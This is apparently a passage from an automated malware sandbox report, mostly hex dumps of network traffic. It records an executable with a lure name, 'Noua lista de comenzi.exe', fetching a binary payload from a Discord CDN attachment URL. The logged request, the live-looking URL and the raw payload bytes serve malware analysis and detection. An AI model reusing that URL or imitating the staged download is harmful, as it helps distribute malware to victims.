02 b1 46 60 ba 56 6d 11 da 95 4b 1c 45 60 b2 bc 3c f0 0e 98 06 8a 21 e4 5c 0f d9 ea ab 39 f2 db 0e b7 58 d3 1e db 73 47 fa 0d 25 ff b0 f2 d6 73 98 7d f8 f2 7e 44 e4 a2 06 f6 da 39 29 07 93 c8 5d ea 78
                                                                                              Data Ascii: zu(B`k~S<iW6)$bYO>G21bGXc;)JRlLx_J3P|FXtJ:telio_0C=)B 2^6:,P-hy#.-ulF`VmKE`<!\9XsG%s}~D9)]x
                                                                                              2022-01-28 18:02:09 UTC34INData Raw: 51 a1 d2 f0 c8 82 84 f5 0f 01 c3 6d 13 eb d6 e8 68 6d a5 64 b6 25 11 e6 7d 9b 68 70 b0 f3 9c 09 6d 97 b3 a0 7d c6 b9 ac bc af cc dd 7d 09 1b 44 a5 23 bd cf 3f a9 7e 80 ab d6 94 a1 63 3f 5a 9a 69 02 85 91 31 38 80 3a 2c 2b 9c f7 50 cc 86 53 61 b0 c6 c7 78 8c 21 e9 d9 d5 14 6c d7 8c 2b a8 4d 0f e1 c2 db e8 5b 42 79 fa 09 75 88 6f 2b 5c 7c c5 55 b4 36 3f ac c1 2e bf 2d e7 7e 7d cc 7e 86 66 82 76 57 27 9a 05 6f 18 78 96 9f fc e1 eb a7 8a 5b 50 63 91 17 e4 b5 61 8e 59 78 02 59 c3 41 62 80 7a 4b df 94 f7 7c 6b a7 5b c5 ef da df 12 83 ae c5 08 ba 99 7d ce f0 96 81 2d 5c c3 00 b6 ce b2 44 72 7f f9 89 ed 5b 2f ed 88 53 64 4d 53 33 ca 8f c7 69 0e 9e f7 f8 56 2b 8f 1a 04 70 54 b9 51 08 3e f7 44 8e 29 a1 73 70 2f ed de 7d f3 98 ec 40 51 27 4e 3d e6 38 03 38 1a fc 8b
                                                                                              Data Ascii: Qmhmd%}hpm}}D#?~c?Zi18:,+PSax!l+M[Byuo+\|U6?.-~}~fvW'ox[PcaYxYAbzK|k[}-\Dr[/SdMS3iV+pTQ>D)sp/}@Q'N=88
                                                                                              2022-01-28 18:02:09 UTC35INData Raw: de 98 00 22 4d 61 ff 41 73 18 62 da 95 17 86 d9 cd 17 71 f4 10 a8 d5 b1 4b 4a c4 2d 33 55 f2 42 52 da d3 33 64 89 a3 7a c0 97 88 59 b2 83 8c 63 3c f1 67 0b f4 ef 93 42 35 82 b1 80 78 98 cb 3f 6a 41 64 53 81 f9 2b 48 28 26 aa 38 42 1d 17 ef 58 07 02 74 ae e1 12 b6 d1 9f 71 c2 ba 20 84 5a 4f 86 4b 98 dd ae 07 d0 b8 3c c6 90 ca 55 72 f7 53 89 c7 d8 ae ee a7 8d b8 e2 43 6a 11 8b 5e 2e 2f 42 7d ee ba 50 98 e0 88 13 ee 51 48 ce 41 14 63 04 74 71 69 89 bc d3 67 d3 17 f9 52 91 b9 27 46 37 93 c2 ad 80 0b 16 46 0e dc 1e cb 65 09 11 21 e5 c8 44 c3 0e e7 3b 1a 53 d8 62 05 58 9e 24 b4 89 a6 7f d8 60 b3 43 51 15 2c 1e 4e 25 c5 00 ca 7a 85 9a 03 36 08 ff bb ce 99 87 dd 13 0c 83 c0 9a 0a e0 7c 4e df fb bf a2 69 f8 cd 8b a9 6d 26 ce 6e 48 ea 29 95 31 c5 37 8a a8 34 5d 55
                                                                                              Data Ascii: "MaAsbqKJ-3UBR3dzYc<gB5x?jAdS+H(&8BXtq ZOK<UrSCj^./B}PQHActqigR'F7Fe!D;SbX$`CQ,N%z6|Nim&nH)174]U
                                                                                              2022-01-28 18:02:09 UTC37INData Raw: 9d 2c 53 00 a0 77 9f 80 2c 33 1c 24 0c 8b ce e4 51 3e 31 0e fa c9 f0 df a0 20 44 eb a3 b9 38 73 cf 48 90 5f 71 76 44 43 1f 93 a5 18 11 af 0d 31 11 93 ed c8 d2 f2 35 f6 15 5a d5 e5 22 a3 ba e0 47 7f a0 49 13 88 7b ba bd 44 ad 13 c3 94 51 64 fe 6b 7e 38 75 ce 32 4b 5b 64 c5 4c e2 ae 19 05 57 52 c5 3b 7e 55 3e f7 90 40 09 14 02 ed 37 13 d1 11 d6 93 46 f7 8e 21 db fb 59 19 94 3a 10 6e 70 47 69 a8 20 3d 6e 11 e6 f2 b4 ae 46 8d 13 72 0d ec 21 e9 3c ac c7 95 a7 c5 2b eb 83 8a 45 98 97 3f 6e 15 87 61 bc de 9c c5 41 dc f5 cc 67 5b 5a 13 a6 14 12 55 ed b2 c9 0f f2 9c 1f 6b 4d 06 a5 66 46 d6 9c 85 b7 a8 98 60 17 d9 04 f5 46 2e 5a 44 22 34 ed 57 3b 77 40 91 50 44 ee a2 b0 f8 74 bf 15 fc 31 f9 bd c8 b7 bb 66 b6 df 59 23 8d e8 3c e7 ce 3e 26 3b aa 19 5e a1 fc 49 0e 75
                                                                                              Data Ascii: ,Sw,3$Q>1 D8sH_qvDC15Z"GI{DQdk~8u2K[dLWR;~U>@7F!Y:npGi =nFr!<+E?naAg[ZUkMfF`F.ZD"4W;w@PDt1fY#<>&;^Iu
                                                                                              2022-01-28 18:02:09 UTC38INData Raw: 81 36 d0 1c ab f6 46 8f eb 65 b5 8b 67 86 f0 28 22 33 93 7c 49 45 60 78 22 e4 2e 96 7e 84 8b af 96 a9 c8 c8 bd 83 47 97 50 44 20 60 1b f4 4d 67 c6 c2 d0 b4 57 30 53 7c b4 ae 04 54 42 9a 56 03 76 8c aa 74 03 1c cf 78 9c d0 16 18 58 1e 29 49 b3 da 11 bb 94 4c 1a f8 b6 b0 e7 47 0f 67 ef 78 e6 b0 05 82 b1 c7 a1 ab 4a cc 85 db 04 cc e5 5c 21 56 55 1b 6a 18 00 2c 47 b7 be b9 76 ca fd 77 75 05 3d 14 e5 4f 46 e8 ea 25 d1 21 37 31 c2 49 da 13 83 9f 84 be b0 af bb 4c 55 28 e3 86 f2 46 8d a3 e2 3e 27 90 1a 75 63 ba 57 4c fe a1 1f 9f 05 e2 7c f0 a8 d3 c1 46 e8 5a 4b c4 d5 ef 11 8a 0a a0 60 68 9a a6 80 82 5e 18 0f db 49 1f f9 b9 57 63 ab e4 c0 e6 46 39 ec 35 32 d1 a2 1b dd 86 cd f0 21 29 9c cf e5 43 18 91 64 c4 2c bb b1 fb f9 3a f6 98 0c 38 47 6f c9 5d f9 7f 1c 93 f3
                                                                                              Data Ascii: 6Feg("3|IE`x".~GPD `MgW0S|TBVvtxX)ILGgxJ\!VUj,Gvwu=OF%!71ILU(F>'ucWL|FZK`h^IWcF952!)Cd,:8Go]
                                                                                              2022-01-28 18:02:09 UTC39INData Raw: 54 d1 fd 79 91 8f a6 ec 5a cc a9 aa cf ee a6 86 6a 85 e5 88 7f f5 83 ec 4c 96 49 38 fd f4 fd 64 bc b8 71 68 e3 e2 36 06 e7 e9 04 f4 da 84 23 e1 c2 9d b2 e9 9c 6d 7a 87 b9 55 69 05 09 c9 f4 e3 f1 4d 8e 40 d6 2a dc 75 8a ee 42 70 85 ab 74 e5 26 50 48 b6 8a 23 4b e1 0b 19 74 9d 3f fb 25 f3 41 68 2a e2 a4 25 b5 ab 00 c6 6a bf 83 60 d2 6a 91 7c 36 38 0d 57 2d bb 8b ae a0 d2 b9 f1 a3 3b 55 51 e4 fa 5d d6 7b 29 ee 5a 98 11 99 8a 91 fe cf dc 56 60 82 27 7b f8 f0 9c 6c 6e d0 47 63 36 3a 09 6e 8b 7b b7 36 ca dd 49 89 b4 b2 07 d3 0a 29 ff 09 86 44 e5 d4 1a 94 07 9a e9 6b 63 9f d1 e8 69 a8 98 e8 db 96 da 08 e3 15 55 f1 d4 45 d2 39 ef 6e 42 5a c8 74 0a 28 49 34 60 cd b2 19 26 14 c8 83 58 50 8b e7 4b 9d b8 13 d0 f3 ad 79 c9 9d 14 99 2e 5c 0b 12 db a8 b6 43 f6 ad f5 88
                                                                                              Data Ascii: TyZjLI8dqh6#mzUiM@*uBpt&PH#Kt?%Ah*%j`j|68W-;UQ]{)ZV`'{lnGc6:n{6I)DkciUE9nBZt(I4`&XPKy.\C
                                                                                              2022-01-28 18:02:09 UTC41INData Raw: fb f3 3c 1b b7 68 25 8a 53 6f b4 d4 62 fd ee a5 43 02 77 c0 48 aa 1d fd 01 2e d4 45 19 7a 44 02 1c 40 73 7d c8 d2 a1 1f 8d 92 33 18 6b e1 e8 21 38 56 bd c4 ee a9 3a e3 fe 90 6a 4e f2 fe 84 af 48 03 de 02 6b 39 e1 62 50 79 91 3b e3 33 64 b7 29 a6 b4 ab 7d fb 63 a6 8d 3a 92 d3 d6 54 b6 f6 d0 e1 fc 36 e8 8d c6 5a 65 0a e3 26 cc b6 4b ea 56 aa cb 4c b6 c5 3a b4 d2 6f 53 ed 22 7c 08 7b dd 7e 90 31 57 59 b9 49 10 5c 92 e9 29 b5 d2 64 8a 9e 26 21 da 6b 00 1d 99 15 88 53 67 3a 71 ed 34 36 01 3d a8 94 a9 95 46 ea 5b 10 59 10 43 0c 93 f5 44 63 52 49 08 93 8e 24 c9 eb 17 c8 d0 a3 56 af 77 d6 eb b3 41 69 3a fe e6 7c 7e 43 5c c9 f4 ac f0 b8 e8 ef de 40 d3 f8 b7 2e c6 6a 8b c0 5f f2 2f c1 a2 27 22 69 97 93 b5 4c 11 e8 9d 6f 32 97 30 dc a9 68 ff 87 98 72 67 37 7d 76 6e
                                                                                              Data Ascii: <h%SobCwH.EzD@s}3k!8V:jNHk9bPy;3d)}c:T6Ze&KVL:oS"|{~1WYI\)d&!kSg:q46=F[YCDcRI$VwAi:|~C\@.j_/'"iLo20hrg7}vn
                                                                                              2022-01-28 18:02:09 UTC42INData Raw: 62 85 47 46 e2 4a 1a b7 ab 14 80 a1 76 5f 35 b8 59 4c f9 09 24 6e a9 95 22 31 42 f6 87 61 37 74 23 6a 0e 76 b8 a5 86 06 70 9e 10 50 22 42 56 87 34 de 1a 9c 09 60 91 cb 79 cc 56 af 49 76 98 4c 93 4c d3 b5 3b 71 68 53 cc 88 20 20 6f 64 35 bc 7b 80 43 62 57 10 0b e2 16 de 7f 55 a0 69 eb 0f 88 cc 68 f7 19 20 b5 06 ba 10 55 f4 65 cc 57 2c a0 a1 83 45 fb 7e 1d 46 7c 96 3a 89 8c d2 17 91 3f 2a 6b 82 db 15 86 cf 83 3e 19 73 f8 7f b2 d1 08 54 50 85 18 f0 dd cb fc d3 6e 6b 07 77 67 f4 89 a4 78 ed de ef db 6e ec 6d 38 33 8a 6f 83 f8 25 ea 50 cb fe ba ad f7 ae 83 00 32 03 32 0c 97 d5 19 c2 95 58 c0 c2 d4 be d5 94 bd 16 50 c0 ab 7e 96 55 8a b8 9e 72 0c a8 b6 fa 3a 11 13 27 cb ed 9e 6b ff 9d 2d 20 fc 28 3e c6 fe 91 b3 d4 90 3d 4a f8 be a7 cd 3e 5d e3 c5 a7 65 a1 9a 4f
                                                                                              Data Ascii: bGFJv_5YL$n"1Ba7t#jvpP"BV4`yVIvLL;qhS od5{CbWUih UeW,E~F|:?*k>sTPnkwgxnm83o%P22XP~Ur:'k- (>=J>]eO
                                                                                              2022-01-28 18:02:09 UTC43INData Raw: e7 48 10 f6 01 cb 9c 3d a2 9b 3f a6 ee ae ef 6c 72 48 5d 46 01 c4 37 b6 ff b5 28 a9 6b 3d 9f a1 93 59 33 d3 89 46 0e a3 07 1c af 91 37 b6 cb 45 f3 66 03 80 44 18 8b ef 91 be 95 d8 85 09 2a a7 ee cf f7 4b 5f 0d 2d ae 62 cb 66 1d fc 54 94 3b 9b 67 f4 b0 f8 30 02 65 73 49 8a 0b bc bd a3 12 6d 31 86 14 5d d9 fa 41 ff 06 6f 2c a3 d0 67 e4 c6 82 7b fd 7f 20 67 01 02 b1 7e 9a fc 3d 90 12 09 96 06 cf 33 b6 c7 de 93 51 71 2f 85 31 96 43 d7 fe 83 b4 39 07 3a 89 28 f0 2d 50 c0 d0 f6 d8 af 7e 49 8b 9b bc df 1e a4 66 84 42 ef 4f 57 29 34 68 6b cf 0d 70 e3 a4 e9 26 57 6b 30 cd 12 1c 2e 37 2c 28 2c 13 6a 6f e7 bb 54 d7 e5 48 1c 33 46 2c f8 59 d2 6c 51 7b f1 ac 88 d0 05 48 0d a4 ea 57 b3 06 25 27 bf 54 33 1e 41 54 ef 48 2a f0 d4 62 28 2c 2e 3b 67 ec 35 86 6a b1 23 48 91
                                                                                              Data Ascii: H=?lrH]F7(k=Y3F7EfD*K_-bfT;g0esIm1]Ao,g{ g~=3Qq/1C9:(-P~IfBOW)4hkp&Wk0.7,(,joTH3F,YlQ{HW%'T3ATH*b(,.;g5j#H
                                                                                              2022-01-28 18:02:09 UTC45INData Raw: c2 2d 96 42 0e 6d 2a 29 ad 9e b3 3e d7 75 83 a6 07 43 68 b3 73 0b ae 81 61 44 00 95 b2 ce 87 02 68 c8 c2 9d cf a3 4d ab b6 b1 d4 e3 43 f9 b2 2a a6 e5 5b cb ec 14 11 d9 d8 ff 09 9d 67 dd c8 c3 4b e1 64 49 f9 81 81 12 5a ab aa d0 a0 29 2b b8 e6 4d b0 d0 3b 70 c6 03 79 1d 1b a0 d5 5d 94 5f d1 cd 3d 7a 14 8a d2 e3 5a 39 84 5f 76 5b 21 36 9e 71 ef 79 8e d9 2e 5c 4d dd 86 ce 12 1e 26 cc 0e a5 a4 b1 42 e4 ab 7c 0a 77 e3 af 12 8b 70 a4 eb e3 29 54 65 41 52 ca f2 b1 44 91 a9 50 f7 45 62 d2 18 f8 b7 b3 7a f6 26 cc 4d ab aa 1d 55 3b 7f 57 ae f8 18 48 fe 04 6c 49 01 a3 ed 3b 11 04 0e f0 be ad 71 2d a3 a0 f1 ec 32 fa b2 20 f4 52 3f 41 08 e9 4a c4 25 8a 63 04 78 3d e6 ca 1c d9 0e 97 0e 81 27 7e 09 f5 2f b6 4e b8 48 cd d4 ab 71 1f 31 a8 93 53 0c 3c 5d c3 90 51 96 c0 b1
                                                                                              Data Ascii: -Bm*)>uChsaDhMC*[gKdIZ)+M;py]_=zZ9_v[!6qy.\M&B|wp)TeARDPEbz&MU;WHlI;q-2 R?AJ%cx='~/NHq1S<]Q
                                                                                              2022-01-28 18:02:09 UTC46INData Raw: b9 2f d6 5b e3 fb b1 77 7b b8 4d 2d 41 95 88 62 89 d5 85 51 42 3a 15 c5 38 ec f3 cd 92 07 8e 2a 15 cc 6d 58 b2 a1 bb 26 b3 b8 df f7 ba e5 53 25 d9 38 05 03 38 fc f9 6d 2a 1b c9 3c ea 46 87 a8 e0 ae c5 09 12 91 2a 1d 58 ea ee 5e a9 6c 62 fe 7c 10 44 8d 52 1c 44 8b 57 aa fa 30 0b 24 25 e0 16 77 ed dc 95 4a 26 6f 18 79 fc e0 6c fe 8e 24 29 ad 72 53 a7 83 f1 93 88 6c e7 c8 8e 25 d1 19 1e 53 3b fa 1c 35 6d f7 88 51 47 7c 17 0f 19 f2 15 cd 39 1c 71 51 72 63 07 e2 af a0 57 51 4f 7a 8b ee 3c 76 58 c2 95 8f 90 c6 66 b0 a7 51 01 09 12 60 4e de 0a fc 5c c4 47 ec 5b a9 97 71 23 e8 58 dc 07 34 20 7e 3f 9b 61 de bf 1b f4 12 68 69 45 0f 8c 13 c3 0c 98 09 f3 54 de 78 43 65 b5 4a 1a 7b f9 86 a2 c1 1e 40 92 dc 93 b8 ed d9 eb ba 05 1e fe 66 82 49 ef 90 c3 08 a5 62 4f 0c eb
                                                                                              Data Ascii: /[w{M-AbQB:8*mX&S%88m*<F*X^lb|DRDW0$%wJ&oyl$)rSl%S;5mQG|9qQrcWQOz<vXfQ`N\G[q#X4 ~?ahiETxCeJ{@fIbO
                                                                                              2022-01-28 18:02:09 UTC47INData Raw: 9b 41 1a e2 40 0e 42 da 0e 7f 40 c9 9e 83 f7 2e 09 84 74 26 60 d0 04 b3 da 57 df fe 7f 29 56 8e 25 da 6e f8 b8 e6 d1 21 82 09 17 f5 42 ac 66 6a ad c2 d2 18 9c 00 2c 60 40 69 02 08 9e 87 e4 df 71 27 79 e8 6f 17 10 7e 11 c0 af 7f c8 89 52 34 32 ae b6 a6 4d d7 41 43 07 db 9b 87 86 3e 34 aa 18 f3 48 c4 6e d6 63 5b 29 a8 7d 50 ec d2 a5 12 5e 93 cd e0 93 b0 f9 b3 46 9c 99 6d fe 33 88 6b 03 09 a5 67 0e aa 09 b2 a7 83 86 31 40 49 bc d5 9b 89 6f 61 be dd 07 e2 75 ec 64 82 c5 a9 2e b1 78 72 52 22 1e 2f 8c f8 b9 32 c5 c6 b9 51 79 fc 6c 11 e4 97 bc d3 1f 2b 5f 3a 20 43 6d 76 6e 01 08 ad 48 df 68 8d a6 e1 62 4e 26 85 d0 a8 e6 4c 1b 2a 27 9f d4 95 c2 9a cd 3c 22 67 e6 bf f4 1d f5 b4 c6 c0 2c 1e 0e ab 71 28 db a3 ed 26 42 95 40 cf 4f 4d 42 60 2f bf d5 fe 02 b3 40 d5 95
                                                                                              Data Ascii: A@B@.t&`W)V%n!Bfj,`@iq'yo~R42MAC>4Hnc[)}P^Fm3kg1@Ioaud.xrR"/2Qyl+_: CmvnHhbN&L*'<"g,q(&B@OMB`/@
                                                                                              2022-01-28 18:02:09 UTC49INData Raw: 5c d1 26 6f 67 2a 5a 55 b4 c8 84 7b cc fd 0b 13 bc ed e2 71 e2 0b 6f 9e 44 d4 92 31 8b 37 6d 28 a7 79 15 10 da 06 86 59 57 d1 27 bd 25 e7 c4 4a b4 a7 eb 8d 9d b9 53 6c 0e 64 8e a3 8f 52 f0 b9 3a 42 9f bc 5c 44 a8 cc 19 06 cb 9f 64 0e e2 b2 eb 26 37 8a 63 3d 34 9e f0 02 7c 03 31 88 57 e7 46 79 70 96 60 df f0 22 a3 39 fe 95 bb c2 cf 80 d1 fa ff 5d 20 4e 75 e8 6d 9f 95 39 ef 28 ae c2 a3 38 4b 7a 94 2a 8f 46 b0 71 76 e0 e5 fd 33 bc e3 c4 5d 25 b5 df c8 23 a8 6c 1f cc cf be a5 5e 29 9a 84 3a 99 04 ba 8f 12 69 08 62 a5 1a 96 d7 5c c6 88 53 da 4a ce 8c 17 c3 b5 db fc a2 4d c7 b1 54 40 8e 15 06 34 bc 45 98 34 c6 82 3b a0 15 c3 b4 7c 50 5a c2 9b b7 58 ba 37 79 fe 3c 22 5d 5a b6 16 43 64 bb 1c 71 56 0c a8 d0 9a 07 05 98 f9 44 dc 7b c4 82 74 fc 43 53 5a 5a 1d b0 5f
                                                                                              Data Ascii: \&og*ZU{qoD17m(yYW'%JSldR:B\Dd&7c=4|1WFyp`"9] Num9(8Kz*Fqv3]%#l^):ib\SJMT@4E4;|PZX7y<"]ZCdqVD{tCSZZ_
                                                                                              2022-01-28 18:02:09 UTC50INData Raw: 9e fb 65 7a bc d2 94 dc 1e 94 d0 f1 ad e1 08 7b 79 3a 2e 04 68 4d 37 e4 ae 23 7e 7e 07 36 81 83 c1 28 c4 40 c6 71 20 70 7a b2 b8 a5 2b 38 e7 2e 62 75 d5 18 09 f5 32 e5 ce 1c 49 a4 ab 41 69 f2 cc d7 3f 93 bc b5 84 26 a4 f2 53 e8 1b 5f c7 ea 89 e0 e8 0b 2c 2c 11 da ef 2d 4c 80 c5 d1 19 7b b6 d2 a7 bc 9c d1 79 4b 79 ac df 6b 0e 06 ee d8 81 f0 ce bf 50 4e 58 59 fa ce 73 15 26 32 90 03 97 ad 37 53 34 55 e2 e7 d8 eb 13 b1 86 f5 ef eb 75 13 31 10 ca 2a 50 0d 18 1e de 19 3e 88 f8 d9 3c ae 46 d0 cb b9 14 ab 12 47 89 5b 1d 80 ed 7a 19 d3 93 77 e4 c8 01 ef 32 b4 5b 08 77 e5 43 50 c8 0e b2 9f b4 1f 54 27 b8 90 14 8d f8 d2 e4 28 31 19 4e a7 8d 9e 5c 03 ae ea ae a6 71 d3 9c 6c 55 de 97 82 54 32 1d e2 36 c3 7d 90 2b f1 54 e0 2c 92 24 b7 d3 ec 23 e9 ad 06 13 ed b0 b8 83
                                                                                              Data Ascii: ez{y:.hM7#~~6(@q pz+8.bu2IAi?&S_,,-L{yKykPNXYs&27S4Uu1*P><FG[zw2[wCPT'(1N\qlUT26}+T,$#
                                                                                              2022-01-28 18:02:09 UTC51INData Raw: d5 12 66 8f 1b b7 92 01 0b 23 e1 4f 33 5c bb f7 ca 6e 49 0a ea db 62 d9 e3 09 1b f0 28 d1 03 75 75 61 23 16 41 60 81 c0 04 e4 90 45 50 ca be 15 9f 6b 40 4e bb a7 b7 38 70 14 e3 b3 4e c9 54 d6 6d f6 7e 1d 59 b9 49 8b ce 33 31 aa 02 47 20 9a 8d a6 89 1e bf a2 95 4f 4f b5 93 c3 f3 07 63 30 36 01 3a ac 66 63 e1 8d 4c 15 e7 a0 17 f4 f4 57 24 fa f5 56 be cd e4 b6 e4 91 f0 22 ba 0a f5 5f 5f 57 b2 30 62 60 b0 f3 46 27 da 8a 3e 67 eb 3d 97 48 c7 06 65 f1 c2 5c c4 d5 e0 96 20 86 50 89 34 c8 c1 ad 45 82 b5 14 a1 99 8d dd 90 ab 75 db c1 18 7c 46 0f a3 f2 b3 09 26 66 27 84 4b be e5 8b 79 9c 88 9b 70 15 16 73 1a 78 17 73 08 2f d9 62 20 45 e9 33 be 90 b4 ff 21 20 7e 4a 64 82 e4 fc 0e 9e b0 98 98 40 d8 83 a2 60 cb ee 8d 93 5a 7c 44 14 bc d1 f5 79 ce 63 e4 7d 09 d8 67 ff
                                                                                              Data Ascii: f#O3\nIb(uua#A`EPk@N8pNTm~YI31G OOc06:fcLW$V"__W0b`F'>g=He\ P4Eu|F&f'Kypsxs/b E3! ~Jd@`Z|Dyc}g
                                                                                              2022-01-28 18:02:09 UTC53INData Raw: 81 c1 ff 8b 92 b2 fc a5 7e 79 c9 e9 91 c7 c3 cf 75 83 f1 9a 84 df ed e9 fb e5 c6 84 0b 91 59 1a e7 2a bf 51 ab 9d 91 d7 df f1 32 5a a1 e5 ce 8b 3b 2a 68 63 e1 86 f8 0e 7a 22 ed 89 4a f0 17 9e 51 3b 6a d5 a0 29 ab 7b fa dd 6d ad 48 4d 4e 2e c8 d1 97 cb 80 04 13 de 96 3b 98 7b 1f 16 43 9c d8 5a 5c 76 51 a4 a2 2c 19 1a b1 26 8a 48 f3 53 62 8a b8 98 63 c0 ee 2d 68 80 45 b2 a4 a1 39 90 8c 1f 59 c3 b5 fa dc e3 6d 24 48 64 ba d2 07 07 16 bd 2d 94 b8 d7 58 b1 4b 7e ff fd 16 7c b8 17 fc 30 b2 f5 e1 2a 1c 70 04 8c 5f 89 ec 5e 22 56 04 1b c7 04 1e 42 c1 29 94 08 0a 9b db d0 a9 60 3d 92 1c 42 e4 47 f2 1e b4 c2 91 bd a3 a5 95 bd 15 ff 18 4b e6 31 bd 20 b2 81 19 31 ed b0 bb 57 57 fb e9 10 4f 46 80 49 74 ca ee 9a 23 1f b1 41 50 73 8b 7c 29 ab 15 ff 88 e9 a6 00 4f 03 69
                                                                                              Data Ascii: ~yuY*Q2Z;*hcz"JQ;j){mHMN.;{CZ\vQ,&HSbc-hE9Ym$Hd-XK~|0*p_^"VB)`=BGK1 1WWOFIt#APs|)Oi
                                                                                              2022-01-28 18:02:09 UTC54INData Raw: 09 d0 9b fa bc d2 10 1d fd ee 5d ae 70 a5 6c ca b7 5c 42 a8 85 28 01 8a 24 d8 f0 9d ad f4 cf 03 9b 92 d4 0d 6a 60 6d 74 ee ce bd bf 21 3a d2 9e 76 9b ee da 61 b3 07 9f 9f 13 93 cc 18 7f fd a1 aa b0 2e 7b 42 46 aa 1c 17 9a f8 15 79 7c ea ae d1 e7 f8 a8 a8 36 d2 e9 87 eb a8 a5 c8 44 d4 bd 91 ea fc d4 1b 25 e6 ce 14 f7 54 79 8e ae 21 44 de dc 68 bc 9f 6f bd 5e 2d c7 ae f3 19 ed d6 52 22 dc 09 84 2b 32 36 6e 8c 2e 02 61 ea 2f 35 b7 dc f9 3a 22 c8 82 c3 44 df cf 60 3b a8 71 1c c5 00 2f b5 3d 8c 4a 28 2b 95 b7 b9 f5 da f2 1d 41 64 37 d2 a7 6d fb cf c5 ce ab c3 46 71 93 0a 8a da e0 63 de 15 6a 8f 3d ed 5c 33 80 29 29 af ea 7e 4b 42 03 13 9b 61 6a 2f f6 d0 10 12 8a 80 3b 64 d5 99 8e a3 f9 20 bf 39 ec 2e 55 df f2 e2 6f 13 dc 9b cb 79 5e e3 3f cc ff 71 43 f6 b7 c0
                                                                                              Data Ascii: ]pl\B($j`mt!:va.{BFy|6D%Ty!Dho^-R"+26n.a/5:"D`;q/=J(+Ad7mFqcj=\3))~KBaj/;d 9.Uoy^?qC


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.349744162.159.134.233443C:\Users\user\Desktop\Noua lista de comenzi.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-01-28 18:02:09 UTC58OUTGET /attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji HTTP/1.1
                                                                                              User-Agent: 9
                                                                                              Host: cdn.discordapp.com
                                                                                              Cache-Control: no-cache
                                                                                              2022-01-28 18:02:09 UTC58INHTTP/1.1 200 OK
                                                                                              Date: Fri, 28 Jan 2022 18:02:09 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 514560
                                                                                              Connection: close
                                                                                              CF-Ray: 6d4c21505fa49238-FRA
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 30018
                                                                                              Cache-Control: public, max-age=31536000
                                                                                              Content-Disposition: attachment;%20filename=Tdfgwnfyyvslxmhqyfimidqqywchnji
                                                                                              ETag: "f493f19d3321c61c6a854faf08b9664e"
                                                                                              Expires: Sat, 28 Jan 2023 18:02:09 GMT
                                                                                              Last-Modified: Fri, 28 Jan 2022 04:41:10 GMT
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              x-goog-generation: 1643344870150958
                                                                                              x-goog-hash: crc32c=09/Jdw==
                                                                                              x-goog-hash: md5=9JPxnTMhxhxqhU+vCLlmTg==
                                                                                              x-goog-metageneration: 1
                                                                                              x-goog-storage-class: STANDARD
                                                                                              x-goog-stored-content-encoding: identity
                                                                                              x-goog-stored-content-length: 514560
                                                                                              X-GUploader-UploadID: ADPycduHCmb3LIfL2HH4XBq8eRR0n39PUKp2MeqZwSE8DOng62cOfzZ1Kz-CCFAHvwp8mOq3bGQUC_Ncitc9O8DBsdE
                                                                                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RJoswLm4OvVkPte%2FdhhB4zInl159vH6ztPmNBAcfKltGW6krRAkyDhLxIB2Grha1uw8OgWeA2qojy%2BwcwU2gF5RgOAT2%2FsPp%2BfWxJPZjZTyPsI3KoKErch3AJuXqygUb8j3Mxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              2022-01-28 18:02:09 UTC60INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                              Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                              2022-01-28 18:02:09 UTC60INData Raw: 06 a5 4a de 52 ef 92 0b 20 69 27 89 f8 1d e7 fd a1 b7 7b dc 55 77 dd cb 3d bf 08 b9 73 c7 1a 4e e3 ed f4 0b 3c 37 b9 6f 21 f7 98 2b 8e 0c bb 6c b6 e1 d7 c0 8d 87 e6 73 db c9 2e 1b e5 ec 7b c8 9a 29 8c 07 29 84 7f fa 06 ac db c7 1f ef 83 fc 24 76 42 c1 0f c3 01 06 b3 60 9c 25 fe 2c 0d 2d 88 77 c4 97 a4 c0 99 bd 19 db c0 80 60 96 1c 73 c4 9d a6 c2 8a 7f f2 11 df de 58 f7 92 17 d6 51 6b 20 67 20 6a ad 48 cc b0 e7 e3 ea 71 3a 31 89 fb af 54 f7 92 12 5a 9b b2 e2 6e bf 02 a5 42 d5 38 25 f3 88 7d dc 41 5a 9b ad 56 f1 83 e8 71 2e 15 df d0 b6 eb f6 04 be 9c 2b 84 66 a6 c2 8f 9b ad 56 f1 83 e8 71 2e 0a ad 5f 1e 61 11 c3 10 55 71 30 1e 6c b5 6c a1 a1 a1 be 8a 77 c9 24 79 c2 89 f2 00 9f b0 e1 ce b5 75 cf 21 f9 9f b0 e1 ce aa de 5f 14 4b 5d 1a 46 d7 c3 1f e2 64 98 23
                                                                                              Data Ascii: JR i'{Uw=sN<7o!+ls.{))$vB`%,-w`sXQk g jHq:1TZnB8%}AZVq.+fVq._aUq0llw$yu!_K]Fd#
